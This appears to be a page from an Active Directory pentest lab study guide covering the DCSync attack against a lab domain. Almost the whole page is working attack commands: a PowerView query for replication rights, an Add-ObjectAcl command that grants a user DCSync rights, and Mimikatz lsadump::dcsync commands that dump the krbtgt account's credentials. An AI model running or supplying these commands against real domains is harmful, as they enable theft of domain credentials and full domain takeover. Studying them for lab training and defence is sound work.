DC Sync

//to check
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.IdentityReference -match "studentx") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

//to add from a admin's session
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName studentx -Rights DCSync -Verbose


Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'


lsadump::dcsync /user:dcorp\krbtgt

PreviousSilver Ticket NextLateral Movement in AD

Last updated 1 year ago